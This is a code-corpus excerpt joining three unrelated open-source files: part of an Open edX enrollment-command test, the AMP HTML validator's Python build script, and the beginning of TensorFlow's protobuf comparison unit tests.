            user = UserFactory.create(username=username, email=email, password=password)
            self.users.append(user)
            self.enrollments.append(CourseEnrollment.enroll(user, self.course.id, mode='audit'))
    @patch('student.management.commands.change_enrollment.logger')
    @ddt.data(
        # (lookup method, noop flag, expected number of converted users)
        ('email', False, 3),
        ('username', False, 3),
        ('email', True, 0),
        ('username', True, 0),
    )
    @ddt.unpack
    def test_convert_users(self, method, noop, expected_conversions, mock_logger):
        """ The command should update the user's enrollment. """
        user_str = ','.join([getattr(user, method) for user in self.users])
        user_ids = [u.id for u in self.users]
        command_args = {
            'course_id': unicode(self.course.id),
            'to_mode': 'honor',
            'from_mode': 'audit',
            'noop': noop,
            method: user_str,
        }
        # Verify users are not in honor mode yet
        self.assertEqual(
            len(CourseEnrollment.objects.filter(mode='honor', user_id__in=user_ids)),
            0
        )
        call_command(
            'change_enrollment',
            **command_args
        )
        # Verify correct number of users are now in honor mode
        # (zero when --noop was given, since no changes should be committed).
        self.assertEqual(
            len(CourseEnrollment.objects.filter(mode='honor', user_id__in=user_ids)),
            expected_conversions
        )
        mock_logger.info.assert_called_with(
            'Successfully updated %i out of %i users',
            len(self.users),
            len(self.users)
        )
    @patch('student.management.commands.change_enrollment.logger')
    @ddt.data(
        # (lookup method, identifier of a nonexistent user, expected successes)
        ('email', 'dtennant@thedoctor.com', 3),
        ('username', 'dtennant', 3),
    )
    @ddt.unpack
    def test_user_not_found(self, method, fake_user, expected_success, mock_logger):
        # An unknown user in the list should be logged and skipped while the
        # real users are still converted.
        all_users = [getattr(user, method) for user in self.users]
        all_users.append(fake_user)
        user_str = ','.join(all_users)
        real_user_ids = [u.id for u in self.users]
        command_args = {
            'course_id': unicode(self.course.id),
            'to_mode': 'honor',
            'from_mode': 'audit',
            method: user_str,
        }
        # Verify users are not in honor mode yet
        self.assertEqual(
            len(CourseEnrollment.objects.filter(mode='honor', user_id__in=real_user_ids)),
            0
        )
        call_command(
            'change_enrollment',
            **command_args
        )
        # Verify correct number of users are now in honor mode
        self.assertEqual(
            len(CourseEnrollment.objects.filter(mode='honor', user_id__in=real_user_ids)),
            expected_success
        )
        mock_logger.info.assert_called_with(
            'user: [%s] reason: [%s] %s', fake_user, 'DoesNotExist', 'User matching query does not exist.'
        )
| agpl-3.0 |
jlucero-contentad/amphtml | validator/build.py | 17 | 19699 | #!/usr/bin/python2.7
#
# Copyright 2015 The AMP HTML Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the license.
#
"""A build script which (thus far) works on Ubuntu 14."""
import glob
import logging
import os
import platform
import re
import shutil
import subprocess
import sys
import tempfile
def Die(msg):
  """Prints error and exits with status 1.
  Args:
    msg: The error message to emit
  """
  # Write to stderr so the message is visible even when stdout is redirected.
  print >> sys.stderr, msg
  sys.exit(1)
def GetNodeJsCmd():
  """Ensure Node.js is installed and return the proper command to run.

  Probes each candidate binary name by evaluating a trivial expression;
  the first one that runs and prints the expected output wins. Calls
  Die() if no working Node.js binary is found.
  """
  logging.info('entering ...')
  for candidate in ('node', 'nodejs'):
    try:
      probe = subprocess.check_output(
          [candidate, '--eval', 'console.log("42")'])
    except (subprocess.CalledProcessError, OSError):
      # Binary missing or failed to run; try the next name.
      continue
    if probe.strip() == '42':
      logging.info('... done')
      return candidate
  Die('Node.js not found. Try "apt-get install nodejs".')
def CheckPrereqs():
  """Checks that various prerequisites for this script are satisfied.

  Exits via Die() with an actionable message on the first missing
  prerequisite: supported OS, validator source files, protoc, the Python
  protobuf package, npm, and a JVM.
  """
  logging.info('entering ...')
  if platform.system() != 'Linux' and platform.system() != 'Darwin':
    Die('Sorry, this script assumes Linux or Mac OS X thus far. '
        'Please feel free to edit the source and fix it to your needs.')
  # Ensure source files are available.
  for f in ['validator-main.protoascii', 'validator.proto',
            'validator_gen_js.py', 'package.json', 'engine/validator.js',
            'engine/validator_test.js', 'engine/validator-in-browser.js',
            'engine/tokenize-css.js', 'engine/parse-css.js',
            'engine/parse-srcset.js', 'engine/parse-url.js']:
    if not os.path.exists(f):
      Die('%s not found. Must run in amp_validator source directory.' % f)
  # Ensure protoc is available.
  try:
    libprotoc_version = subprocess.check_output(['protoc', '--version'])
  except (subprocess.CalledProcessError, OSError):
    Die('Protobuf compiler not found. Try "apt-get install protobuf-compiler".')
  # Ensure 'libprotoc 2.5.0' or newer.
  m = re.search('^(\\w+) (\\d+)\\.(\\d+)\\.(\\d+)', libprotoc_version)
  if (m.group(1) != 'libprotoc' or
      (int(m.group(2)), int(m.group(3)), int(m.group(4))) < (2, 5, 0)):
    Die('Expected libprotoc 2.5.0 or newer, saw: %s' % libprotoc_version)
  # Ensure that the Python protobuf package is installed.
  for m in ['descriptor', 'text_format']:
    module = 'google.protobuf.%s' % m
    try:
      __import__(module)
    except ImportError:
      Die('%s not found. Try "apt-get install python-protobuf"' % module)
  # Ensure that npm is installed.
  try:
    npm_version = subprocess.check_output(['npm', '--version'])
  except (subprocess.CalledProcessError, OSError):
    Die('npm package manager not found. Try "apt-get install npm".')
  # Ensure npm version '1.3.10' or newer.
  m = re.search('^(\\d+)\\.(\\d+)\\.(\\d+)$', npm_version)
  if (int(m.group(1)), int(m.group(2)), int(m.group(3))) < (1, 3, 10):
    Die('Expected npm version 1.3.10 or newer, saw: %s' % npm_version)
  # Ensure JVM installed. TODO: Check for version?
  # NOTE(review): 'java -version' prints to stderr, hence the redirect.
  try:
    subprocess.check_output(['java', '-version'], stderr=subprocess.STDOUT)
  except (subprocess.CalledProcessError, OSError):
    Die('Java missing. Try "apt-get install openjdk-7-jre"')
  logging.info('... done')
def SetupOutDir(out_dir):
  """Sets up a clean output directory.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
  # Use shutil.rmtree (the module is already imported by this script) instead
  # of shelling out to 'rm -rf': no subprocess, portable across Linux and
  # Mac OS X, and failures surface as OSError rather than CalledProcessError.
  if os.path.exists(out_dir):
    shutil.rmtree(out_dir)
  os.mkdir(out_dir)
  logging.info('... done')
def InstallNodeDependencies():
  """Installs the dependencies using npm."""
  logging.info('entering ...')
  # Install the project dependencies specified in package.json into
  # node_modules, for both the engine (repo root) and the nodejs wrapper.
  for label, working_dir in (('engine', None), ('nodejs', 'nodejs')):
    logging.info('installing AMP Validator %s dependencies ...', label)
    subprocess.check_call(['npm', 'install'], cwd=working_dir)
  logging.info('... done')
def GenValidatorPb2Py(out_dir):
  """Calls the proto compiler to generate validator_pb2.py.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
  subprocess.check_call(['protoc', 'validator.proto',
                         '--python_out=%s' % out_dir])
  # Create an empty __init__.py so out_dir is importable as a package.
  open('%s/__init__.py' % out_dir, 'w').close()
  logging.info('... done')
def GenValidatorProtoascii(out_dir):
  """Assembles the validator protoascii file from the main and extensions.

  Concatenates validator-main.protoascii with every extension's
  validator-*.protoascii (sorted for a deterministic result) into
  <out_dir>/validator.protoascii.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
  # 'with' blocks fix a leak in the original code: the input file handles
  # were opened but never closed.
  with open('validator-main.protoascii') as main_file:
    protoascii_segments = [main_file.read()]
  extensions = glob.glob('extensions/*/0.1/validator-*.protoascii')
  # In the Github project, the extensions are located in a sibling directory
  # to the validator rather than a child directory.
  if not extensions:
    extensions = glob.glob('../extensions/*/0.1/validator-*.protoascii')
  extensions.sort()
  for extension in extensions:
    with open(extension) as extension_file:
      protoascii_segments.append(extension_file.read())
  with open('%s/validator.protoascii' % out_dir, 'w') as out_file:
    out_file.write(''.join(protoascii_segments))
  logging.info('... done')
def GenValidatorGeneratedJs(out_dir):
  """Calls validator_gen_js to generate validator-generated.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
  # These imports happen late, within this method because they don't necessarily
  # exist when the module starts running, and the ones that probably do
  # are checked by CheckPrereqs.
  from google.protobuf import text_format
  from google.protobuf import descriptor
  from dist import validator_pb2
  import validator_gen_js
  out = []
  validator_gen_js.GenerateValidatorGeneratedJs(
      specfile='%s/validator.protoascii' % out_dir,
      validator_pb2=validator_pb2,
      text_format=text_format,
      descriptor=descriptor,
      out=out)
  out.append('')  # trailing newline when joined below
  # 'with' guarantees the handle is flushed and closed even if write fails;
  # the original left the file open on error.
  with open('%s/validator-generated.js' % out_dir, 'w') as generated_file:
    generated_file.write('\n'.join(out))
  logging.info('... done')
def GenValidatorGeneratedMd(out_dir):
  """Calls validator_gen_md to generate validator-generated.md.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  assert re.match(r'^[a-zA-Z_\-0-9]+$', out_dir), 'bad out_dir: %s' % out_dir
  # These imports happen late, within this method because they don't necessarily
  # exist when the module starts running, and the ones that probably do
  # are checked by CheckPrereqs.
  from google.protobuf import text_format
  from dist import validator_pb2
  import validator_gen_md
  out = []
  validator_gen_md.GenerateValidatorGeneratedMd(
      specfile='%s/validator.protoascii' % out_dir,
      validator_pb2=validator_pb2,
      text_format=text_format,
      out=out)
  out.append('')  # trailing newline when joined below
  # 'with' guarantees the handle is flushed and closed even if write fails;
  # the original left the file open on error.
  with open('%s/validator-generated.md' % out_dir, 'w') as generated_file:
    generated_file.write('\n'.join(out))
  logging.info('... done')
def CompileWithClosure(js_files, closure_entry_points, output_file):
  """Compiles the arguments with the Closure compiler for transpilation to ES5.

  Args:
    js_files: list of files to compile
    closure_entry_points: entry points (these won't be minimized)
    output_file: name of the Javascript output file
  """
  # Base invocation: ES6-strict input transpiled to ES5-strict output.
  cmd = [
      'java', '-jar', 'node_modules/google-closure-compiler/compiler.jar',
      '--language_in=ECMASCRIPT6_STRICT', '--language_out=ES5_STRICT',
      '--js_output_file=%s' % output_file, '--only_closure_dependencies',
  ]
  for entry_point in closure_entry_points:
    cmd.append('--closure_entry_point=%s' % entry_point)
  # Closure library sources (tests excluded via '!' patterns).
  cmd.extend([
      'node_modules/google-closure-library/closure/**.js',
      '!node_modules/google-closure-library/closure/**_test.js',
      'node_modules/google-closure-library/third_party/closure/**.js',
      '!node_modules/google-closure-library/third_party/closure/**_test.js',
  ])
  cmd.extend(js_files)
  subprocess.check_call(cmd)
def CompileValidatorMinified(out_dir):
  """Generates a minified validator script, which can be imported to validate.

  Args:
    out_dir: output directory
  """
  logging.info('entering ...')
  # Engine sources plus the generated spec produced earlier in the build.
  source_files = [
      'engine/htmlparser.js', 'engine/parse-css.js',
      'engine/parse-srcset.js', 'engine/parse-url.js',
      'engine/tokenize-css.js',
      '%s/validator-generated.js' % out_dir,
      'engine/validator-in-browser.js', 'engine/validator.js',
      'engine/amp4ads-parse-css.js', 'engine/dom-walker.js',
      'engine/htmlparser-interface.js',
  ]
  # Public API symbols kept un-minified as Closure entry points.
  entry_points = [
      'amp.validator.validateString',
      'amp.validator.renderValidationResult',
      'amp.validator.renderErrorMessage',
  ]
  CompileWithClosure(
      js_files=source_files,
      closure_entry_points=entry_points,
      output_file='%s/validator_minified.js' % out_dir)
  logging.info('... done')
def RunSmokeTest(out_dir, nodejs_cmd):
  """Runs a smoke test (minimum valid AMP and empty html file).

  Args:
    out_dir: output directory
    nodejs_cmd: the command for calling Node.js
  """
  logging.info('entering ...')
  # Run index.js on the minimum valid amp and observe that it passes.
  proc = subprocess.Popen(
      [nodejs_cmd, 'nodejs/index.js', '--validator_js',
       '%s/validator_minified.js' % out_dir,
       'testdata/feature_tests/minimum_valid_amp.html'],
      stdout=subprocess.PIPE,
      stderr=subprocess.PIPE)
  (stdout, stderr) = proc.communicate()
  # Success requires an exact PASS line on stdout, nothing on stderr,
  # and a zero exit status.
  if (stdout != 'testdata/feature_tests/minimum_valid_amp.html: PASS\n' or
      stderr != '' or proc.returncode != 0):
    Die('Smoke test failed. returncode=%d stdout="%s" stderr="%s"' %
        (proc.returncode, stdout, stderr))

  # Run index.js on an empty file and observe that it fails.
  proc = subprocess.Popen(
      [nodejs_cmd, 'nodejs/index.js', '--validator_js',
       '%s/validator_minified.js' % out_dir,
       'testdata/feature_tests/empty.html'],
      stdout=subprocess.PIPE,
      stderr=subprocess.PIPE)
  (stdout, stderr) = proc.communicate()
  if proc.returncode != 1:
    Die('smoke test failed. Expected p.returncode==1, saw: %s' %
        proc.returncode)
  expected_prefix = ('testdata/feature_tests/empty.html:1:0 '
                     'The mandatory tag \'html')
  if not stderr.startswith(expected_prefix):
    Die('smoke test failed; stderr was: "%s"' % stderr)
  logging.info('... done')
def RunIndexTest(nodejs_cmd):
  """Runs the index_test.js, which tests the NodeJS API.

  Args:
    nodejs_cmd: the command for calling Node.js
  """
  logging.info('entering ...')
  # index_test.js expects to run from within the nodejs/ directory.
  proc = subprocess.Popen([nodejs_cmd, './index_test.js'],
                          stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE,
                          cwd='nodejs')
  (stdout, stderr) = proc.communicate()
  if proc.returncode != 0:
    Die('index_test.js failed. returncode=%d stdout="%s" stderr="%s"' %
        (proc.returncode, stdout, stderr))
  logging.info('... done')
def CompileValidatorTestMinified(out_dir):
  """Runs closure compiler for validator_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/htmlparser.js', 'engine/parse-css.js',
             'engine/parse-srcset.js', 'engine/parse-url.js',
             'engine/tokenize-css.js',
             '%s/validator-generated.js' % out_dir,
             'engine/validator-in-browser.js', 'engine/validator.js',
             'engine/amp4ads-parse-css.js', 'engine/htmlparser-interface.js',
             'engine/dom-walker.js', 'engine/validator_test.js']
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['amp.validator.ValidatorTest'],
      output_file='%s/validator_test_minified.js' % out_dir)
  logging.info('... success')
def CompileValidatorLightTestMinified(out_dir):
  """Runs closure compiler for validator-light_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/htmlparser.js', 'engine/parse-css.js',
             'engine/parse-srcset.js', 'engine/parse-url.js',
             'engine/tokenize-css.js', '%s/validator-generated.js' % out_dir,
             'engine/validator-in-browser.js', 'engine/validator.js',
             'engine/amp4ads-parse-css.js', 'engine/htmlparser-interface.js',
             'engine/dom-walker.js', 'engine/validator-light_test.js']
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['amp.validator.ValidatorTest'],
      output_file='%s/validator-light_test_minified.js' % out_dir)
  logging.info('... success')
def CompileHtmlparserTestMinified(out_dir):
  """Runs closure compiler for htmlparser_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/htmlparser.js', 'engine/htmlparser-interface.js',
             'engine/htmlparser_test.js']
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['amp.htmlparser.HtmlParserTest'],
      output_file='%s/htmlparser_test_minified.js' % out_dir)
  logging.info('... success')
def CompileParseCssTestMinified(out_dir):
  """Runs closure compiler for parse-css_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/parse-css.js', 'engine/parse-url.js',
             'engine/tokenize-css.js', 'engine/css-selectors.js',
             'engine/json-testutil.js', 'engine/parse-css_test.js',
             '%s/validator-generated.js' % out_dir]
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['parse_css.ParseCssTest'],
      output_file='%s/parse-css_test_minified.js' % out_dir)
  logging.info('... success')
def CompileParseUrlTestMinified(out_dir):
  """Runs closure compiler for parse-url_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/parse-url.js', 'engine/parse-css.js',
             'engine/tokenize-css.js', 'engine/css-selectors.js',
             'engine/json-testutil.js', 'engine/parse-url_test.js',
             '%s/validator-generated.js' % out_dir]
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['parse_url.ParseURLTest'],
      output_file='%s/parse-url_test_minified.js' % out_dir)
  logging.info('... success')
def CompileAmp4AdsParseCssTestMinified(out_dir):
  """Runs closure compiler for amp4ads-parse-css_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/amp4ads-parse-css_test.js', 'engine/parse-css.js',
             'engine/parse-url.js', 'engine/amp4ads-parse-css.js',
             'engine/tokenize-css.js', 'engine/css-selectors.js',
             'engine/json-testutil.js',
             '%s/validator-generated.js' % out_dir]
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['parse_css.Amp4AdsParseCssTest'],
      output_file='%s/amp4ads-parse-css_test_minified.js' % out_dir)
  logging.info('... success')
def CompileParseSrcsetTestMinified(out_dir):
  """Runs closure compiler for parse-srcset_test.js.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  sources = ['engine/parse-srcset.js', 'engine/json-testutil.js',
             'engine/parse-srcset_test.js',
             '%s/validator-generated.js' % out_dir]
  CompileWithClosure(
      js_files=sources,
      closure_entry_points=['parse_srcset.ParseSrcsetTest'],
      output_file='%s/parse-srcset_test_minified.js' % out_dir)
  logging.info('... success')
def GenerateTestRunner(out_dir):
  """Generates a test runner: a nodejs script that runs our minified tests.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
  """
  logging.info('entering ...')
  extensions_dir = 'extensions'
  # In the Github project, the extensions are located in a sibling directory
  # to the validator rather than a child directory.
  if not os.path.isdir(extensions_dir):
    extensions_dir = '../extensions'
  # Use a context manager so the script is flushed and closed before we
  # chmod (and later execute) it; the previous version never closed the
  # file handle.
  with open('%s/test_runner' % out_dir, 'w') as f:
    f.write("""#!/usr/bin/nodejs
global.assert = require('assert');
global.fs = require('fs');
global.path = require('path');
var JasmineRunner = require('jasmine');
var jasmine = new JasmineRunner();
process.env.TESTDATA_ROOTS = 'testdata:%s'
require('./validator_test_minified');
require('./validator-light_test_minified');
require('./htmlparser_test_minified');
require('./parse-css_test_minified');
require('./parse-url_test_minified');
require('./amp4ads-parse-css_test_minified');
require('./parse-srcset_test_minified');
jasmine.onComplete(function (passed) {
    process.exit(passed ? 0 : 1);
});
jasmine.execute();
""" % extensions_dir)
  # 0o750 (owner rwx, group rx): the runner must be executable. The 0o
  # prefix is valid in both Python 2.6+ and Python 3, unlike the old 0750.
  os.chmod('%s/test_runner' % out_dir, 0o750)
  logging.info('... success')
def RunTests(out_dir, nodejs_cmd):
  """Runs all the minified tests.

  Args:
    out_dir: directory name of the output directory. Must not have slashes,
      dots, etc.
    nodejs_cmd: the command for calling Node.js
  """
  logging.info('entering ...')
  test_runner = '%s/test_runner' % out_dir
  # check_call raises if the runner exits non-zero, i.e. if any test fails.
  subprocess.check_call([nodejs_cmd, test_runner])
  logging.info('... success')
def Main():
  """The main method, which executes all build steps and runs the tests."""
  logging.basicConfig(
      format='[[%(filename)s %(funcName)s]] - %(message)s', level=logging.INFO)
  nodejs_cmd = GetNodeJsCmd()
  CheckPrereqs()
  InstallNodeDependencies()
  SetupOutDir(out_dir='dist')
  # Generate the protoascii, pb2 python module, and generated js/md
  # artifacts into dist/.
  GenValidatorProtoascii(out_dir='dist')
  GenValidatorPb2Py(out_dir='dist')
  # NOTE(review): this second GenValidatorProtoascii call with identical
  # arguments looks redundant -- confirm whether anything between the two
  # calls invalidates the first output before removing it.
  GenValidatorProtoascii(out_dir='dist')
  GenValidatorGeneratedJs(out_dir='dist')
  GenValidatorGeneratedMd(out_dir='dist')
  # Build the minified validator and sanity-check it before the full suite.
  CompileValidatorMinified(out_dir='dist')
  RunSmokeTest(out_dir='dist', nodejs_cmd=nodejs_cmd)
  RunIndexTest(nodejs_cmd=nodejs_cmd)
  # Compile every *_test.js bundle, then run them all via the generated
  # test_runner script.
  CompileValidatorTestMinified(out_dir='dist')
  CompileValidatorLightTestMinified(out_dir='dist')
  CompileHtmlparserTestMinified(out_dir='dist')
  CompileParseCssTestMinified(out_dir='dist')
  CompileParseUrlTestMinified(out_dir='dist')
  CompileAmp4AdsParseCssTestMinified(out_dir='dist')
  CompileParseSrcsetTestMinified(out_dir='dist')
  GenerateTestRunner(out_dir='dist')
  RunTests(out_dir='dist', nodejs_cmd=nodejs_cmd)


if __name__ == '__main__':
  Main()
| apache-2.0 |
hehongliang/tensorflow | tensorflow/python/util/protobuf/compare_test.py | 165 | 19171 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for python.util.protobuf.compare."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import re
import textwrap
import six
from google.protobuf import text_format
from tensorflow.python.platform import googletest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.protobuf import compare_test_pb2
def LargePbs(*args):
  """Converts ASCII string Large PBs to messages."""

  def parse(text):
    # Each argument is an ASCII-format serialization of a Large message.
    pb = compare_test_pb2.Large()
    text_format.Merge(text, pb)
    return pb

  return [parse(text) for text in args]
class ProtoEqTest(googletest.TestCase):
  """Tests for the compare.ProtoEq() equality/ordering helper."""

  # These deliberately shadow TestCase.assertNotEquals/assertEquals so the
  # test bodies below can express ProtoEq expectations tersely on ASCII
  # protobuf strings.
  def assertNotEquals(self, a, b):
    """Asserts that ProtoEq says a != b."""
    a, b = LargePbs(a, b)
    googletest.TestCase.assertEquals(self, compare.ProtoEq(a, b), False)

  def assertEquals(self, a, b):
    """Asserts that ProtoEq says a == b."""
    a, b = LargePbs(a, b)
    googletest.TestCase.assertEquals(self, compare.ProtoEq(a, b), True)

  def testPrimitives(self):
    # Non-message arguments are compared directly.
    googletest.TestCase.assertEqual(self, True, compare.ProtoEq('a', 'a'))
    googletest.TestCase.assertEqual(self, False, compare.ProtoEq('b', 'a'))

  def testEmpty(self):
    self.assertEquals('', '')

  def testPrimitiveFields(self):
    self.assertNotEquals('string_: "a"', '')
    self.assertEquals('string_: "a"', 'string_: "a"')
    self.assertNotEquals('string_: "b"', 'string_: "a"')
    self.assertNotEquals('string_: "ab"', 'string_: "aa"')

    self.assertNotEquals('int64_: 0', '')
    self.assertEquals('int64_: 0', 'int64_: 0')
    self.assertNotEquals('int64_: -1', '')
    self.assertNotEquals('int64_: 1', 'int64_: 0')
    self.assertNotEquals('int64_: 0', 'int64_: -1')

    self.assertNotEquals('float_: 0.0', '')
    self.assertEquals('float_: 0.0', 'float_: 0.0')
    self.assertNotEquals('float_: -0.1', '')
    self.assertNotEquals('float_: 3.14', 'float_: 0')
    self.assertNotEquals('float_: 0', 'float_: -0.1')
    self.assertEquals('float_: -0.1', 'float_: -0.1')

    self.assertNotEquals('bool_: true', '')
    self.assertNotEquals('bool_: false', '')
    self.assertNotEquals('bool_: true', 'bool_: false')
    self.assertEquals('bool_: false', 'bool_: false')
    self.assertEquals('bool_: true', 'bool_: true')

    self.assertNotEquals('enum_: A', '')
    self.assertNotEquals('enum_: B', 'enum_: A')
    self.assertNotEquals('enum_: C', 'enum_: B')
    self.assertEquals('enum_: C', 'enum_: C')

  def testRepeatedPrimitives(self):
    self.assertNotEquals('int64s: 0', '')
    self.assertEquals('int64s: 0', 'int64s: 0')
    self.assertNotEquals('int64s: 1', 'int64s: 0')
    self.assertNotEquals('int64s: 0 int64s: 0', '')
    self.assertNotEquals('int64s: 0 int64s: 0', 'int64s: 0')
    self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0')
    self.assertNotEquals('int64s: 0 int64s: 1', 'int64s: 0')
    self.assertNotEquals('int64s: 1', 'int64s: 0 int64s: 2')
    self.assertNotEquals('int64s: 2 int64s: 0', 'int64s: 1')
    self.assertEquals('int64s: 0 int64s: 0', 'int64s: 0 int64s: 0')
    self.assertEquals('int64s: 0 int64s: 1', 'int64s: 0 int64s: 1')
    self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 0')
    self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 1')
    self.assertNotEquals('int64s: 1 int64s: 0', 'int64s: 0 int64s: 2')
    self.assertNotEquals('int64s: 1 int64s: 1', 'int64s: 1 int64s: 0')
    self.assertNotEquals('int64s: 1 int64s: 1', 'int64s: 1 int64s: 0 int64s: 2')

  def testMessage(self):
    self.assertNotEquals('small <>', '')
    self.assertEquals('small <>', 'small <>')
    self.assertNotEquals('small < strings: "a" >', '')
    self.assertNotEquals('small < strings: "a" >', 'small <>')
    self.assertEquals('small < strings: "a" >', 'small < strings: "a" >')
    self.assertNotEquals('small < strings: "b" >', 'small < strings: "a" >')
    self.assertNotEquals('small < strings: "a" strings: "b" >',
                         'small < strings: "a" >')

    self.assertNotEquals('string_: "a"', 'small <>')
    self.assertNotEquals('string_: "a"', 'small < strings: "b" >')
    self.assertNotEquals('string_: "a"', 'small < strings: "b" strings: "c" >')
    self.assertNotEquals('string_: "a" small <>', 'small <>')
    self.assertNotEquals('string_: "a" small <>', 'small < strings: "b" >')
    self.assertEquals('string_: "a" small <>', 'string_: "a" small <>')
    self.assertNotEquals('string_: "a" small < strings: "a" >',
                         'string_: "a" small <>')
    self.assertEquals('string_: "a" small < strings: "a" >',
                      'string_: "a" small < strings: "a" >')
    self.assertNotEquals('string_: "a" small < strings: "a" >',
                         'int64_: 1 small < strings: "a" >')
    self.assertNotEquals('string_: "a" small < strings: "a" >', 'int64_: 1')
    self.assertNotEquals('string_: "a"', 'int64_: 1 small < strings: "a" >')
    self.assertNotEquals('string_: "a" int64_: 0 small < strings: "a" >',
                         'int64_: 1 small < strings: "a" >')
    self.assertNotEquals('string_: "a" int64_: 1 small < strings: "a" >',
                         'string_: "a" int64_: 0 small < strings: "a" >')
    self.assertEquals('string_: "a" int64_: 0 small < strings: "a" >',
                      'string_: "a" int64_: 0 small < strings: "a" >')

  def testNestedMessage(self):
    self.assertNotEquals('medium <>', '')
    self.assertEquals('medium <>', 'medium <>')
    self.assertNotEquals('medium < smalls <> >', 'medium <>')
    self.assertEquals('medium < smalls <> >', 'medium < smalls <> >')
    self.assertNotEquals('medium < smalls <> smalls <> >',
                         'medium < smalls <> >')
    self.assertEquals('medium < smalls <> smalls <> >',
                      'medium < smalls <> smalls <> >')

    self.assertNotEquals('medium < int32s: 0 >', 'medium < smalls <> >')

    self.assertNotEquals('medium < smalls < strings: "a"> >',
                         'medium < smalls <> >')

  def testTagOrder(self):
    """Tests that different fields are ordered by tag number.

    For reference, here are the relevant tag numbers from compare_test.proto:
    optional string string_ = 1;
    optional int64 int64_ = 2;
    optional float float_ = 3;
    optional Medium medium = 7;
    optional Small small = 8;
    """
    self.assertNotEquals('string_: "a" ',
                         ' int64_: 1 ')
    self.assertNotEquals('string_: "a" int64_: 2 ',
                         ' int64_: 1 ')
    self.assertNotEquals('string_: "b" int64_: 1 ',
                         'string_: "a" int64_: 2 ')
    self.assertEquals('string_: "a" int64_: 1 ',
                      'string_: "a" int64_: 1 ')
    self.assertNotEquals('string_: "a" int64_: 1 float_: 0.0',
                         'string_: "a" int64_: 1 ')
    self.assertEquals('string_: "a" int64_: 1 float_: 0.0',
                      'string_: "a" int64_: 1 float_: 0.0')
    self.assertNotEquals('string_: "a" int64_: 1 float_: 0.1',
                         'string_: "a" int64_: 1 float_: 0.0')
    self.assertNotEquals('string_: "a" int64_: 2 float_: 0.0',
                         'string_: "a" int64_: 1 float_: 0.1')
    self.assertNotEquals('string_: "a" ',
                         ' int64_: 1 float_: 0.1')
    self.assertNotEquals('string_: "a" float_: 0.0',
                         ' int64_: 1 ')
    self.assertNotEquals('string_: "b" float_: 0.0',
                         'string_: "a" int64_: 1 ')

    self.assertNotEquals('string_: "a"', 'small < strings: "a" >')
    self.assertNotEquals('string_: "a" small < strings: "a" >',
                         'small < strings: "b" >')
    self.assertNotEquals('string_: "a" small < strings: "b" >',
                         'string_: "a" small < strings: "a" >')
    self.assertEquals('string_: "a" small < strings: "a" >',
                      'string_: "a" small < strings: "a" >')

    self.assertNotEquals('string_: "a" medium <>',
                         'string_: "a" small < strings: "a" >')
    self.assertNotEquals('string_: "a" medium < smalls <> >',
                         'string_: "a" small < strings: "a" >')
    self.assertNotEquals('medium <>', 'small < strings: "a" >')
    self.assertNotEquals('medium <> small <>', 'small < strings: "a" >')
    self.assertNotEquals('medium < smalls <> >', 'small < strings: "a" >')
    self.assertNotEquals('medium < smalls < strings: "a" > >',
                         'small < strings: "b" >')
class NormalizeNumbersTest(googletest.TestCase):
  """Tests for NormalizeNumberFields()."""

  def testNormalizesInts(self):
    pb = compare_test_pb2.Large()
    pb.int64_ = 4
